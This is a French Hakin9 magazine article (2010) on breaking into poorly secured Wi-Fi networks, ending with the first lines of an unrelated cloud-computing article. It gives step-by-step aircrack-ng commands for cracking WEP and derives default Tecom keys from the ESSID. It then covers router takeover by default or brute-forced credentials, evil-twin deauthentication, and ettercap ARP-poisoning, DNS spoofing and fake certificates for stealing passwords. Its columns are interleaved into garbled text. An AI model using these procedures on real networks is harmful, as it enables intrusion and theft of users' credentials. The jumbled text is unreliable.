P' = RC4(Cle|iv) XOR (M'|CRC32(M')) iv et de réduire l'entropie des clés.
récupérée, nous sommes capables de
commencer à envoyer des requêtes qui d'où Des astuces
seront comprises par l'AP – nous envoyons Une astuce consiste à utiliser un iv connu pour
toujours des messages avec le même iv –. P XOR P' = (M|CRC32(M)) XOR chiffrer une trame longue - mais inférieure à
La sortie (M'|CRC32(M')) la MTU du lien - que nous fragmentons ; l'AP,
en recevant la trame, la réassemble puis la
rechiffre avant de la réémettre. Nous aurons
donc accès à un nouvel iv avec une sortie du
RC4 plus intéressante.
Une autre astuce développée par Korek
porte sur le caractère linéaire de la fonction
CRC32 utilisée pour calculer l'intégrité
d'un message. Dès lors, il est possible de
modifier un paquet légitime et de l'injecter
Figure 3. Le protocole DNS permet la traduction d'une URL en adresse IP dans le trafic de telle sorte que ce paquet

42 HAKIN9 3/2010

40_49____wifi.indd 42 2010-03-10, 16:24:41


INTRUSION ET EXPLOITATION D'UN RÉSEAU MAL SÉCURISÉ

soit valable. La méthode chopchop repose réception du signal, les ESSID et BSSID $ aireplay–ng –1 0 –e ESSID –a
également sur le fait qu'un message – respectivement les noms et adresses adr_mac_AP –h
tronqué devient invalide. L'idée est donc MAC de l’AP –, le canal d’émission, ainsi adr_mac_station
de tronquer un message légitime de son que le type de chiffrement de chacun des interface
dernier octet et de le renvoyer. En effet, routeurs. Nousne nous concentrerons
en effectuant un XOR avec une certaine évidemment que sur les routeurs qui Nous allons maintenant utiliser airplay qui
valeur, le message tronqué M deviendra de utilisent un chiffrement de type WEP. Pour est un injecteur de paquets. "Le but est
nouveau valide. Cette valeur ne dépend que restreindre notre attaque sur une seule box, ici de générer des messages chiffrées
de l'octet tronqué, ce qui donne une fois de nous passerons en paramètre l'adresse en grande quantité avec des vecteurs
plus des informations intéressantes. MAC du point d'accès cible et le canal sur d'initialisation – iv – variés de telle sorte
lequel il émet. qu'à terme, nous aurons suffisamment de
La prise de contrôle d'une Nous lançons un processus iv faibles pour réduire l'entropie du domaine
box à chiffrement faible d'association. La notion d'association dans des clés et la découvrir". La documentation
Voici une procédure qui permet de les réseaux wifi correspond à la mise en sur aireplay indique que l’attaque la plus
découvrir en quelques minutes la clé WEP relation d'un point d'accès avec notre pertinente est l’attaque de type –3, dite de
souhaitée : station. Cette association n'est possible réinjection d’ARP. Il s’agit en fait d’injecter
Nous détectons les interfaces wifi que si le processus d'authentification de la des requêtes ARP que nous envoyons
présentes sur notre ordinateur et nous station auprès de l'AP a réussi avec succès. par milliers au point d’accès. L'avantage
nous assurons que notre carte wifi permet Il s'agit donc de s'authentifier auprès du de l'injection d'ARP est que les paquets
l’injection de paquets. Ceci dépend des point d'accès. Pour cela, nous utiliserons transmis sont très courts et, comme ils
puces – chipset – positionnées sur la carte une attaque "–1" dite de fake authentication. correspondent à une certaine norme, la
réseau. Des listes de cartes wifi supportant Cette attaque enverra un paquet de réponse de l'AP est connue dans la quasi
l’injection de paquets sont disponibles sur désauthentification à une station connectée totalité. La syntaxe est la suivante :
internet. Nous sélectionnons l’interface qui recherchera alors immédiatement à
choisie et la plaçons en mode monitor se reconnecter. Notre ordinateur prendra $aireplay–ng –3 –e ESSID –b @_mac_AP
: ce mode – également appelé mode alors soin d'écouter attentivement le défi –h @_mac_station
promiscuous – permet à notre ordinateur proposé et récupèrera ainsi une sortie interface
de recevoir tous les paquets, même RC4 afin de se faire passer à son tour pour
ceux qui ne nous sont pas destinés. Ces une machine légitime. Nous ouvrons une Puis, pour finir, nous utiliserons le fichier
différentes actions se font avec les lignes seconde console en parallèle pour laisser de capture, fichier dans lequel tous les
de commandes suivantes : tourner airedump et nous proposons la paquets ont été positionnés. Pour avoir des
ligne de commande suivante : chances de trouver la clé, comptons qu’il
$ airmon–ng //détecte les interfaces wifi
$ airmon–ng start ath0 // met l’interface
ath0 en mode promiscuous.

Nous sommes donc maintenant en


mesure de capter et de lire – sans les
comprendre encore – tous les paquets
qui sont échangés et qui circulent sur des
ondes wifi.
Maintenant que nous sommes en
mesure d’écouter le réseau, nous pouvons
commencer à analyser le spectre wifi pour
découvrir les points d'accès. Pour cela,
nous utilisons airodump, qui fait partie de
la suite aircrack. La ligne de commande
correspondante est :
$airodump–ng --write capture
ath1 //scanne le réseau et écrit dans le
fichier capture
Cette commande a pour effet de
capter tous les beacons émis et dresse
ainsi la liste des AP à distance raisonnable.
Nous pouvons apprécier la puissance de Figure 4. Exemple de figure : ne mettez pas de point final après la description

3/2010 HAKIN9 43

40_49____wifi.indd 43 2010-03-10, 16:24:49


PRATIQUE
faut en moyenne avoir capturé 300 000 d'un an. Celle-ci n'est autre que le résultat Mais, comme si cette solution était
paquets pour une clé de 64 bits et 1 000 de l'incompétence et de la dangerosité des trop complexe, l'équipe de Club Internet
000 pour une clé 128. Une fois ce nombre fournisseurs d'accès eux-même. a développé un outil, nommé WEPtool qui
atteint, nous pouvons utiliser aircrack en s'occupe lui même de faire tous les calculs.
parallèle avec la syntaxe suivante : Le WEPtool En effet, cet outil sorti du chapeau demande
Certains se sont peut être déjà demandé uniquement l'identifiant et la version de la
aircrack–ng –x fichier_capture comment étaient générées les clés utilisées box puis sort lui-même la clé WEP. Inutile
par défaut par leur point d'accès. Les de dire que cet outil est disponible en ligne
Cette commande nous donnera la clé plus sages, ou les plus avertis en ce qui avec un magnifique tutoriel expliquant pas
WEP recherchée. Dans le cas contraire, concerne la sécurité informatique, auront à pas son utilisation.
nous continuons la capture des paquets probablement imaginé qu'il s'agissait tout
puis nous recommençons. simplement de clés générées par des Le fuzzing
Au final, trois outils ont été utilisés en générateurs aléatoires quelconques de telle Enfin, si les méthodes proposées ci-
parallèle pour arriver à notre fin : airodump sorte qu'il est à priori impossible – ou du dessus n'ont pas fonctionné pour la
pour sniffer les paquets, aireplay, pour moins très très long – de trouver la clé sans prise de contrôle d'un AP, nous pourrons
rejouer et stimuler le réseau, et aircrack un minimum de travail. Mais l'intelligence fait nous intéresser à la technique de fuzzing
pour trouver la clé. parfois défaut aux meilleurs d'entre nous... – il s'agit d'injecter des données aléatoires
Ainsi, les ingénieurs de l'ancien FAI Club dans un programme et de chercher un
Le wep et l'exotisme Internet – racheté en fin 2008 par Le 9 - ont bug ou un dépassement de tampon.
D'autres moyens plus exotiques existent pensé relier la clé WEP par défaut à l' ESSID Des techniques sont à l'heure actuelle en
pour trouver une clé WEP, méthodes qui, de la box. Dès lors, la clé WEP n'était autre cours de développement pour mettre en
cette fois-ci, ne reposent absolument pas que les 26 premiers caractères de la fonction évidence divers types de failles au niveau
sur des failles structurelles du protocole. de hachage sha1 appliquée à l'ESSID. Les des routeurs personnels – attaques de
En passant outre les différentes méthodes routeurs Tecom-AH4021 et Tecom-AH4222 fuzzing sur les drivers.
d'ingénieure sociale ou de phishing qu'il sont particulièrement vulnérables. Par
serait bon de ne pas passer à la trappe exemple, si votre box a pour ESSID TECOM- Accès à l’interface
– puisque parfois bien plus efficaces AH4222-527A92 il suffit de chercher sur la utilisateur de la box
et rapides que n'importe quelle autre toile un calculateur de hash sha1 puis de Une fois la clé WEP connue et notre MAC
méthode -, une solution aussi originale prendre les 26 premiers caractères de la modifiée, nous sommes maintenant en
qu'étrange a fait scandale il y a un peu plus sortie, comme le représente la Figure 1. mesure de pénétrer discrètement dans le
WLAN de la cible. Nous nous connectons à
l'interface utilisateur en tapant dans la barre
d’adresse de notre navigateur l’adresse
IP du routeur. Le plus souvent, il s’agit de
192.168.1.1 ou d’une adresse par défaut
dont une liste est proposée sur internet.
Nous accèdons alors à une interface
d’administration du point d’accès, cependant
protégé par un nom d’utilisateur et un mot
de passe. Nous tentons les champs par
défaut – Ceci suffira pour la plupart des
cas. Si ça ne suffit pas, nous pouvons tenter
une attaque par dictionnaire. Dans le cas
où cela ne fonctionne toujours pas, nous
pouvons tenter une attaque en force brute,
mais elle risquerait d’être trop longue et ce
serait un peu comme tuer une mouche à
coups de bazookas. Nous préférerons alors
changer de cible.
Une fois le nom d’utilisateur et le mot
de passe correct saisis, il nous est alors
possible de modifier tous les paramètres
de l’utilisateur.
Un des premiers avantages immédiats
Figure 5. Le scan de réseau est la première étape dans l'attaque MITM est l'anonymat que nous procure cette

44 HAKIN9 3/2010

40_49____wifi.indd 44 2010-03-10, 16:24:57


INTRUSION ET EXPLOITATION D'UN RÉSEAU MAL SÉCURISÉ

intrusion. En effet, après avoir pris le contrôle notre AP. Pour cela, il existe plusieurs façons Nous devrions obtenir la réponse suivante :
d'une box, nous circulons sur la toile avec de s’y prendre. Dans tous les cas, nous
une fausse identité. Les conséquences commençons par donner à notre propre $11:09:28 Sending DeAuth to station
en sont graves ; pour ne prendre qu'un box l’identité de BoxPiégée. Ainsi, il n’y a plus –– STMAC: [00:0F:
exemple, revenons sur le très polémique aucune différence entre notre box et celle B5:34:30:30]
HADOPI. Quels seront en effet les recours de la victime : les deux box sont jumelles ;
du quidam, au fin fond de sa campagne, rien ne doit permettre de les distinguer de Ces paquets de deauth sont envoyés
quand il se verra retirer sa connexion sous l’extérieur. Ce sont les « evil twins ». directement de notre PC vers la cible. Il
prétexte de téléchargement illégal ? Mais faudra donc veiller à être physiquement
cette exploitation de notre travail n'est La déshautentification proche d’elle pour que notre carte wifi
qu'une cerise sur le gâteau. L'idée est bel Il s’agit maintenant de piéger l’ordinateur puisse l’atteindre.
et bien de tirer profit de cet accès. Tout de notre cible. Nous commençons par le Une fois déconnectée, la station cible
d'abord, voyons comment se ramener à déconnecter de sa box en utilisant une attaque tente immédiatement de se reconnecter.
un cas similaire lorsque notre victime se de type aireplay–ng déauth . Nous allons Le gestionnaire de réseau Windows
connecte à un hotspot. désauthentifier la station déjà connectée avec – ou Linux – est en effet paramétré pour
De plus en plus, ces points d'accès la ligne de commande suivante : se reconnecter de façon immédiate
libres fleurissent autour de nous, offrant la et il s'attèle à sa tâche. L'attaque est
possibilité au nomade d'accéder à la toile $aireplay–ng –0 1 –a adresseMACdel'AP réussie s'il ne s’est pas reconnecté
et donc à tous ses comptes directement –c adresseMACduclient à BoxPiégée, mais à notre box. Le
lors de sa promenade dans le parc ou ath0 passage délicat est ici. En effet, nous
tout simplement au café du coin. Si les savons que le gestionnaire se connecte
points d'accès sont parfois relativement dont les paramètres signifient : par défaut au réseau qui émet la plus
bien sécurisés de telle sorte que nous ne grande puissance. Il aura donc suffit
pouvons pas les investir afin d'assujettir • 0 = désauthentification au préalable d'augmenter au maximum
l'ensemble du sous réseau. En revanche, • 1 = nombre de deauth. a envoyer (peut notre puissance ou d'être très proche de
il est possible de tromper les internautes être +) la victime. Ainsi, la victime se retrouve
en les connectant à notre propre point • -a adresseMACdel'AP = MAC de l’AP connectée sur notre box. Il est presque
d'accès ; cette idée passe par la notion • -c adresseMACduclient = MAC du impossible ni pour la victime ni pour son
de rogue AP. client que nous sommes en train de ordinateur de voir la différence. Les box
deauth. sont devenues jumelles.
Création du rogue AP
Le rogue AP est un AP qui n’est pas
légitime sur le réseau. Il est rajouté et
émet à l’insu de l’administrateur du réseau.
L'idée est de déconnecter l’utilisateur de
sa propre box pour le reconnecter à la
nôtre, de manière totalement transparente
pour lui. Cela donnera des avantages
considérables – empoisonnement DNS,
possibilité de connaître les sites visités,
les mails envoyés, les mots de passe
utilisés … – que nous détaillerons par
la suite. Ainsi, l’utilisateur sera connecté
à notre box, sans s’en apercevoir. Il s’agit
d’un échange d’identité sur la toile. De plus,
cette technique a l'avantage de pouvoir
être utilisée sur tous les réseaux faiblement
sécurisés ainsi que sur tous les hotspots
proposés par Le Neuf, orange et free, ou
certains cafés et restaurants.

Préparaion préliminaire
des evil twins
La cible est initialement connectée à Figure 6. Le logiciel ettercap permet la récupération des mots de passe sur des sites
BoxPiégée. L’idée est de la reconnecter sur non sécurisés

3/2010 HAKIN9 45

40_49____wifi.indd 45 2010-03-10, 16:25:05


PRATIQUE
Le changement de paramètre possible d'investir un réseau wifi mal La restriction
En revenant au cas précédent de la sécurisé. Passons désormais à de au réseau local
compromission du réseau WEP, une seconde potentielles attaques sur ce réseau. Lors de l'attaque d'une station dans un
méthode consisterait, une fois notre AP jumeau réseau public – wifi libre propriétaire
préparé, à changer directement un paramètre Le contrôle du point d'accès proposé dans certains bars café et
de connexion de la box compromise : Le contrôle du point d'accès – que ce restaurants – il est souvent préférable
soit avec la technique du rogue AP ou de de passer par la technique de rogue
• le nom de BoxPiégée, la compromission de la box – comporte AP pour éviter d'attirer l'attention sur nos
• la clé wep, une quantité d'avantages inestimables. En agissements – certains auront peut
• le mode de chiffrement, effet, il nous est alors possible de changer être pris soin de mettre en place des
• modification du filtrage MAC, l'intégralité des paramètres de connexion et mesures de contrôle qui détecteraient
• … d'abaisser la sécurité afin d'assujettir ensuite les protocoles détaillés ci-dessous. Nous
les stations du sous-réseau directement. pourrons par conséquent appliquer
L'ordinateur immédiatement déconnecté Par exemple, nous contrôlons à présent l'ensemble des propositions énoncées
chercherait alors à se connecter à l'ouverture de certains ports de la box, le ci-dessus. Toutefois, dans la mesure où
BoxPiégée, se connectant ainsi à notre pare-feu, et le serveur DNS, le nom des aucun contrôle durable et à distance n'est
point d'accès. Un tel scénario reste très machines connectées à un instant T... Par envisageable grâce au point d'accès, nous
marginal et sans grand intérêt dans la ailleurs, il est parfois possible d'administrer préférons alors revenir au cas du réseau
mesure où soit la box est déjà sous la box à distance, ce qui renforce la rentabilité local où nous sommes en possession de
contrôle, soit nous ne pouvons pas et la puissance d'une telle attaque. L'univers la clé WEP. De telles attaques sont alors
modifier un de ces paramètres... des possibles est à présent délimité par la plus rapides à monter pour un effet éclair.
Nous venons donc de voir dans limite de l'imagination et ce genre d'attaque La principale restriction des propositions
différents types de cas comment il est peut faire un sujet d'article à lui seul. suivantes demeure donc dans le fait que
l'attaquant et la victime doivent appartenir
au même réseau. Toutes s'appliquent dans
Création d'un faux certificat les cas suivant :
Lorsque nous nous connectons sur un site sécurisé, les données sont chiffrées grâace à un
algorithme de chiffrement asymétrique – du genre RSA –. Ce chiffrement repose sur le partage
d'une clé publique, indispensable au chiffrement des messages. Ainsi, chaque entité chiffre les • Nous connaissons la clé de chiffrement
paquets avec la clé publique et les décrypte avec sa clé privée. Il est important de savoir de façon du réseau sans fil
sûre que l'entité avec laquelle nous dialoguons est effectivement celle qu'elle prétend être, c'est- • Nous sommes dans le même sous
à-dire que la clé publique appartient effectivement à une personne identifiée. Nous avons donc réseau ethernet
recours aux certificats électroniques. • Nous sommes dans le cas du rogue
Un certificat électronique est une sorte de passeport qui permet d'établir un lien entre une
AP
entité physique et une entité virtuelle. Dès lors, lorsque nous nous connectons au site de notre
banque, https://www.bankonline.com, un protocole est mis en place afin de nous assurons que
• Nous avons compromis la box de la
notre interlocuteur est bien authentifié. Ainsi, notre ordinateur télécharge le certificat présenté par victime mais nous préférons attaquer
le site sécurisé puis contrôle l'intégrité des informations contenu dans ce certificat en se référant par le réseau local et les attaques de
à l'autorité de certification compétente – dont le rôle est de certifier la validité du certificat –. type MITM
Celle–ci applique une fonction de hachage au certificat, chiffre le résultat obtenu : ceci constitue
la signature du certificat. Une fonction de hachage est une fonction qui permet d'affirmer l'intégrité
Attaque du type MITM
des données. Elle prend en entrée un message d'une longueur aléatoire et propose en retour une
Une fois le côté choix – contrôle du point
sorte d'empreinte. Concrètement, il s'agit d'une suite d'octets de taille constante, sensée identifier
de manière presque sûre le message proposé en entrée – trouver une autre préimage doit être d'accès ou réseau local - réglé, nous
un problème difficile – . Notre ordinateur déchiffre la signature apposée sur le certificat par le CA pouvons lancer une attaque. La plus
avec la clé publique du CA puis applique la même fonction de hachage au certificat. Si le résultat pratique à mettre en œuvre à ce stade-là
concorde avec celui proposé par la CA, celà signifie que le certificat n'a pas été modifié, le site est fondée sur l'attaque Man In The Middle
est considéré comme s\^ur, et le navigateur lui fera confiance. Dans le cas contraire, le certificat
– que nous abrègerons par MITM. Cette
est proposé à l'utilisateur. C'est la raison pour laquelle dans l'attaque MITM, de faux certificats sont
attaque, comme son nom l’indique, place
présentés à l'utilisateur lorsqu'il se connecte à des sites sécurisés.
Récemment – décembre 2008 – une équipe de chercheurs a trouvé le moyen d'exploiter une l’ordinateur du pirate sur le chemin entre
vulnérabilité de la fonction de hachage MD5 afin d'usurper l'identité d'un site qui utilise le protocole la victime et son point d'accès. Ainsi, à
https - Les prémices de l'explication technique sont proposés en annexe. Dès lors, cette équipe une place stratégique, le pirate peut à sa
est parvenue à créer un faux certificat accepté comme valide par une autorité de certification guise écouter ou modifier les données qui
– qui utilise la fonction de hachage MD5. Ce faux certificat, signé par une autorité compétente, a la transitent de manière non chiffrée sur le
confiance du navigateur. Il est alors possible – mais loin d'être trivial – de combiner cette technique
réseau.
avec le DNS spoofing afin de diriger l'utilisateur vers un site vitrine qui présente un faux certificat
validé, de telle sorte que tout deviendra complètement transparent pour l'utilisateur. D'autres Nous l’avons déjà vu, un ordinateur
méthodes sont disponibles dans l'article SSL Defeating publié par hakin9 en mars 2010. connecté à internet possède deux adresses
différentes : l’adresse MAC qui est l’adresse

46 HAKIN9 3/2010

40_49____wifi.indd 46 2010-03-10, 16:25:20


INTRUSION ET EXPLOITATION D'UN RÉSEAU MAL SÉCURISÉ

physique de la carte réseau – adresse fixe protégé est susceptible d'être lu, copié ou ce nom de domaine, est une conversion en
et donnée par le constructeur – et l’adresse modifié. adresse IP. Pour cela, il envoie une requête
IP. Un paquet qui circule sur internet utilise Si ces cas sont déjà très intéressants à son serveur DNS, serveur attribué lors de
pour se localiser exclusivement l’adresse car la plupart des sites aujourd'hui la négociation de la connexion, afin que
IP. Arrivée dans le sous-réseau, l’adresse fonctionnent sur un modèle faiblement celui–ci lui fournisse l’IP correspondante.
IP n’est plus utilisée que pour la traduction sécurisé, les données sensibles – comptes Une fois qu’il a cette IP, l’ordinateur peut
avec l'adresse MAC qui, elle permettra bancaires, webmails... - ont très souvent faire une requête vers cette IP et ainsi avoir
l'acheminement final du paquet. investi sur le chiffrement des données. Dès accès aux informations qui permettront
Donnons un exemple. Un paquet envoyé lors, tout le trafic issu du protocole HTTPS, d’afficher la page WEB.
par Alice à Bob après avoir parcouru la puisqu'il est chiffré avec un secret partagé Cette image est une capture d’écran
toile est arrivé dans le sous réseau de Bob entre la machine et le serveur ne sera pas de l’analyse de trafic avec wireshark lors du
au niveau du routeur. Le routeur connait accessible sans travail pour le pirate. Une démarrage de Firefox. Nous comprenons
l’adresse IP de Bob mais pas son adresse explication succincte de ce fonctionnement alors bien ce qui se passe. La première
MAC. Il fait alors appel au protocole ARP est proposé dans la Figure 2. requête effectuée par l'ordinateur – dont
qui permet d’établir une correspondance l'adresse IP est 192.168.1.12 – est la
entre l’adresse IP et la MAC. Tout d’abord, DNS Spoofing demande de conversion du nom de
il regarde dans son cache s'il a la En sniffant le trafic émis par la victime, le domaine start.ubuntu.com en adresse IP.
correspondance ipBob MACBob. S’il ne pirate aura très vite accès à ses sites favoris, Pour cela, l’ordinateur fait une requête à
l’a pas, il lance une requête ARP whohas. sa page d’accueil d’internet et tous les sites son serveur DNS –Les informations de
Celle ci, envoyée en broadcast à tout le qu’elle visite très régulièrement. Il pourra connexion indiquent que le serveur DNS
sous-réseau, demande à qui appartient l’IP alors compromettre la bonne marche responsable du sous-réseau est contenu
en question. L'ordinateur de Bob répond en des événements en intervenant au niveau dans la BOX, 192.168.1.1 – Une fois la
donnant en même temps sa MAC. La table du protocole DNS. Les détournements correspondance obtenue – start.ubuntu.com
ARP est mise à jour et le message peut de DNS sont des attaques très en vogue = 91.189.94.199 – la connexion désirée
être envoyé à l’adresse MACBob. à l’heure actuelle. Le rapport annuel de s'établit. Nous comprenons bien ici au
Dans le cadre d’une attaque MITM, le Trend Micro sur les menaces Web mars passage que le contrôle de la box permet
pirate, MAX, va corrompre le cache ARP du 2009. Très faciles à mettre en place, elles le contrôle exclusif du serveur DNS, ce qui
routeur et de l’ordinateur de Bob, la victime. peuvent fournir des informations d’une représente un pouvoir fort.
En envoyant régulièrement des paquets qui certaine valeur –numéro de compte, mots Placé à une place stratégique depuis
mettent à jour le cache ARP, Max donnera à passe pour tel ou tel site…– Le principe l’attaque MITM, l'ordinateur malveillant
l'ordinateur de Bob l’association ipdelabox/ en est simple, mais nécessite une bonne intercepte les requêtes DNS de la
MACMax –et se fera ainsi passer aux yeux connaissance du protocole DNS. cible. Ainsi, lorsqu'elles demandent l’IP
de la station de Bob comme étant le point Le protocole DNS est un protocole de correspondant à un nom de domaine
d'accès – et à la box l’association ipBob/ niveau applicatif qui assure la conversion particulier, l'ordinateur pirate est en mesure
MACMax – et se fera ainsi passer pour entre une adresse ip et un nom de de lui proposer une adresse pointant
l'ordinateur de Bob aux yeux de l'AP –. Dès domaine. L’utilisateur, quand il souhaite sur un site vitrine – site malicieux conçu
lors, le pirate a une position d’intermédiaire visiter un site, saisit le nom de domaine, spécialement pour induire la victime
entre Bob et la box. Chaque paquet transite dit adresse, dans sa barre d’URL – une dans l'erreur. Il s'agit donc pour le pirate
par lui. En effet, l'ordinateur de Bob étant adresse du type www.cestquoiledns.com de consulter certaines pages visitées
sûr que cet ordinateur est le routeur, il lui –. Cette adresse est en fait le nom d’une régulièrement par la victime, et créer un
enverra tous les paquets à transmettre. machine qui est localisée sur internet, site vitrine très similaire avec par exemple
Après une étude, l'ordinateur de Max les comme toutes les autres machines, grâce en fond le téléchargement de logiciels
retransmet à la box avec une modification à une adresse IP (voir Figure 3). Dès lors, la malveillants qui lui permettront de gagner
éventuelle. De même, l'AP est persuadé que première chose que fait l’ordinateur avec un accès sur la station.
l'ordinateur du pirate est en fait celui de Bob.
Il luis transférera donc tous les paquets à
destination de Bob. Ils sont interceptés puis Sur Internet
transmis au destinataire légitime. • http://clubinternet.box-news.fr/forums/viewtopic.php?id=580 – tutoriel de Club Internet sur
Dès lors, Max peut suivant sa volonté l'utilisation de WEPtool
écouter ou modifier les paquets non • http://www.movizdb.com/tags/weptool/ - telechargement de WEPtool
chiffrés avant de les acheminer vers la • http://www.unixgarden.com/index.php/securite/la-mort-annoncee-du-wep -
cible. La récupération de mots de passe • http://www.aircrack-ng.org/doku.php?id=korek_chopchop – documentation officielle de
l'attaque chopchop
issus de protocoles non sécurisés –
• http://sid.rstack.org/blog/index.php/57-pourquoi-c-est-pourri-le-wep-part-2-cassage-en-
comme pop, smtp, telnet, ftp...- est alors regle – détail du protocole WEP, de ses faiblesses, et principe des principales attaques
immédiate. L'intégralité du trafic non

3/2010 HAKIN9 47

40_49____wifi.indd 47 2010-03-10, 16:25:28


PRATIQUE
L'attaque MITM, la pratique l’attaque que nous avons détaillée plus haut. Web visitées par la victime. Cela nous
D’un point de vue pratique, il existe plusieurs Enfin, nous commençons l’attaque avec Start permettra dans le cas où la personne a un
outils très performants pour réaliser ces – Start sniffing (raccourci clavier Ctrl W) webmail sécurisé de connaître le nom de
attaques. Dorénavant, nous utiliserons le Nous sommes maintenant en son webmail. Par ailleurs, nous aurons une
logiciel ettercap lancé en root depuis une position de Man In The Middle. connaissance fine de ses centres d’intérêt,
machine UNIX. Dès lors, nous écoutons toutes les ce qui peut être un atout dans la recherche
Lançons ettercap en super utilisateur communications entre l’ordinateur de la de mots de passe, ou pour une campagne
depuis une console : victime et la box. Par ailleurs, le logiciel de phishing.
$ sudo ettercap –G // Le –G repère tous les noms d'utilisateur et les Sur cette image par exemple, après
permet de lancer l’interface graphique. \ mots de passe qui circulent en clair. Si avoir actionné le plugin remote_browser,
end{verbatim} la victime essaye de rapatrier ses mails, nous voyons que la victime se connecte
Le mode super utilisateur permettra de son ordinateur se connecte au serveur avec le navigateur firefox aux sites
passer la carte en mode promiscuous mail et peut faire appel au protocole www.wanadoo.fr, www.orange.fr...
Une fois le logiciel lancé, nous pop. Comme les mots de passe avec ce Nous pouvons par ailleurs envisager
commençons par préciser que nous protocole circulent en clair – exactement un DNS spoofing afin de conduire la cible
souhaitons sniffer le réseau, mais en Base 64 –, ils sont directement lus et vers des sites vitrines.
uniquement les ondes radios. Pour cela : retranscrits par ettercap. En revanche, il Pour que le DNS spoofing fonctionne,
Sniff – Uniffied Sniffing (nous pourrons est pour l'instant impossible d’avoir un il faudra préciser la liste des sites piégés
également utiliser le raccourci clavier Maj U) accès direct aux conversations chiffrées. et les adresses des serveurs de rechange.
Cette commande permet de sniffer le trafic C’est pourquoi cette méthode ne Pour cela, nous modifions le fichier /etc/
avec une seule interface. Nous choisissons permettra pas de lire les mots de passe etter.dns. Ce fichier fournit directement des
donc l’interface à espionner : wlan0 – des sites sécurisés – protocole https, explications très précises sur les conditions
l’interface wifi –. Pour savoir quelles sont POP3S (over SSL)… Nous ne pourrons d'utilisation et la syntaxe exacte.
les interfaces wifi sur notre ordinateur, nous avoir une mainmise que sur des choses D'autres plugins sont également très
pouvons utiliser la commande iwconfig en non sécurisées. De même, si la victime intéressants – dont certains permettent
mode console qui détaille les extensions wifi. rapatrie ses mails avec le protocole par exemple de changer à la volée les
Le mode sniffing est activé. Il est pops – version sécurisés du protocole images du site visité par la cible, ou de faire
maintenant intéressant de connaître les pop – nous n'aurons aucun moyen des statistiques sur la machine que nous
différents ordinateurs ou routeurs connectés direct de l’espionner. Si ce problème se espionnons – et une étude plus poussée
sur le sous réseau. La commande dédiée à pose, ettercap propose également de du logiciel peut alors être utile afin de
cet effet est Host – Scan for Host (raccourci construire à la volée de faux certificats de l'exploiter en entier sans se cantonner à
clavier : Ctrl S). Cette commande a pour sécurité qui seront envoyés à la victime. l'éternel MITM expliqué ici.
effet d'identifier le masque de sous–réseau Si elle l’accepte, nous aurons accès aux
; puis, l'ordinateur écoute passivement – données même chiffrées mais dans Conclusion
sans envoyer de paquets – puis rassemble des conditions très sophistiquées qui Cet article n'a pas la prétention
les informations obtenues – OS, IP, MAC, nécessitent une préparation attentive d'avoir appris quelque chose de
ports ouverts... - données fournies par un ; par ailleurs, d'autres solutions fondamentalement nouveau. Il s'agit juste
man ettercap - beaucoup plus discrètes existent et ont d'une piqûre de rappel devant l'étonnant
Nous accédons à tous les hôtes avec déjà été énoncées dans les parutions pourcentage de Wifi mal sécurisé que
Host – Host list (raccourci clavier H) précédentes. nous trouvons autour de nous. Ces
Ici, seulement deux hôtes sont présents Nous constatons sur cette image que attaques ne sont que les plus basiques
sur le réseau. Il s’agit des IP 192.168.1.1 la victime a rapatrié ses e–mails. Elle s’est imaginables et une quatité de tutoriels se
(adresse correspondant au routeur) et connecté en pop au serveur 12.242.8.110 sont développés sur la toile pour facilité
192.168.1.11 (adresse correspondant à sur le port 80. Nous voyons également le leur accès aux scripts kiddies. Il est donc
la cible qui est actuellement connecté nom d’utilisateur et le mot de passe qui fondamental de poursuivre cette lutte pour
à internet). Le but de la manœuvre est permet l’authentification. l'information auprès des personnes qui ne
maintenant de positionner notre ordinateur A ce stade, nous sommes arrivés seraient pas encore sensibles.
entre le routeur et notre victime. Pour ce à nous positionner au milieu des
faire, nous sélectionnons la première conversations Victime/Box. Nous pouvons
adresse IP que nous signalons comme alors piéger victime et Box. Pour cela, À propos de l'auteur
David est étudiant à Télécom Paristech, école
cible numéro un (add to target 1) puis la plusieurs plugins ont été développé d'ingénieurs spécialisée dans les nouvelles technologies
de l'information et de la communication. Actuellement
seconde IP que nous déclarons comme par ettercap. Une liste est accessible élève d'un master concernant la sécurité de l'information,
cible numéro deux (add to target 2) directement Plugin – Manage the Plugin il s'intéresse aux vulnérabilités non seulement techniques
mais également humaines, honorant ainsi le social
Précisons ensuite le genre d’attaque à (raccourci clavier Ctrl P). Par exemple, nous engineering d'une place de choix sur la scène de
mener : Mitm – Arp poisoning. Il s’agit de pouvons accéder à l’ensemble des pages l'intrusion dans un système d'informations.

48 HAKIN9 3/2010

40_49____wifi.indd 48 2010-03-10, 16:25:35


40_49____wifi.indd 49 2010-03-10, 16:25:42
PRATIQUE
Sûr comme
MARCIN KOSEDOWSKI

dans les
nuages
Degré de difficulté
Impossible d'éviter le cloud computing. Les fournisseurs de services
feront en sorte de nous attacher à leurs services et s'occuperont
ensuite de nos données. Ce phénomène n'aura pas lieu ni cette
année ni l'année prochaine mais la tendance est claire : de plus
en plus de données et de calculs seront éparpillés sur le Net. Cela
vaut tout simplement le coup.

U
n hacker enfermé dans une pièce sombre exemple d'utilisation du cloud computing. L'utilisateur
utilise son terminal pour accéder à la emploie n'importe quel navigateur et appareil (par
puissance de calcul du serveur. Hacker exemple, un téléphone) pour accéder à son compte.
les protections n'était pas simple mais rentable : Toutes les données sont stockées sur les disques
un utilisateur ordinaire n'a pas d'accès aux du fournisseur et les calculs sont effectués par les
ressources stockées sur le Net. serveurs reliés par le réseau et travaillant ensemble.
S'agit-il des souvenirs du début des années Grâce à cette solution, l'ordinateur de l'utilisateur
80 du 20ème siècle ? Pas du tout – c'est le futur ne nécessite pas une grande puissance de calcul
proche. indispensable par exemple pour filtrer quelques
milliers de messages électroniques. Les serveurs le
Comment un nuage feront plus rapidement que le téléphone. Le dispositif
fonctionne-t-il ? de réception ne doit que télécharger et afficher les
Le terme cloud computing (informatique dans données et communiquer avec le serveur. Il ne sert
les nuages) à la mode ce dernier temps signifie que de terminal.
une manière de partager des ressources et des Les feuilles de calcul, disponibles en-ligne,
services via le Net. L'idée consiste à créer une ainsi que d'autres applications nécessitant une
abstraction qui présente à l'utilisateur un résultat grande puissance de calcul fonctionnent de la
d'une opération ou une ressource sans entrer en même manière. Cette idée n'est pas neuve. Les
CET ARTICLE détails dans le fonctionnement des logiciels et de premiers ordinateurs, accessibles aux utilisateurs
EXPLIQUE
l'équipement et sans les acquérir. Les points forts ordinaires, fonctionnaient exactement de la même
si vos données sont sûres et
pourquoi elles ne le sont pas,
de cette solution sont liés à une évolutivité élevée et manière. L'ordinateur central se trouvait à l'université
